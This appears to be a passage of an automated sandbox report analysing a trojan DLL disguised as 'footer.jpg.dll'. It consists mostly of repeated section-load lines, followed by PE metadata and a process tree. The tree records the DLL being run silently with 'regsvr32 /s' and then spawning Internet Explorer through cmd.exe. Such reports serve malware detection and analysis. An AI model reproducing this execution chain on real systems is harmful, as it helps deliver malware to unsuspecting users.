            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: footer.jpg.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal76.troj.winDLL@13/138@10/3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_048782EB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_048782EB
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9561B4B9-6B6D-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF17DD12A14CEE3B99.TMPJump to behavior
            Source: footer.jpg.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: footer.jpg.dllReversingLabs: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: footer.jpg.dllStatic PE information: real checksum: 0x47a6b should be: 0x51c2b
            Source: footer.jpg.dllStatic PE information: section name: .scalma
            Source: footer.jpg.dllStatic PE information: section name: .submont
            Source: footer.jpg.dllStatic PE information: section name: .enrive
            Source: footer.jpg.dllStatic PE information: section name: .photopo
            Source: footer.jpg.dllStatic PE information: section name: .circumz
            Source: footer.jpg.dllStatic PE information: section name: .cledoni
            Source: footer.jpg.dllStatic PE information: section name: .anamorp
            Source: footer.jpg.dllStatic PE information: section name: .ac
            Source: footer.jpg.dllStatic PE information: section name: .zelania
            Source: footer.jpg.dllStatic PE information: section name: .accusat
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00402040 push ecx; ret 1_2_00402049
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00402093 push ecx; ret 1_2_004020A3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487B0BB push ecx; ret 1_2_0487B0CB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487AD00 push ecx; ret 1_2_0487AD09
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF009C push dword ptr [ebp-000000D8h]; ret 1_2_00EF0231
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF009C push dword ptr [ebp-000000E0h]; ret 1_2_00EF0284
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF009C push dword ptr [esp+10h]; ret 1_2_00EF0396
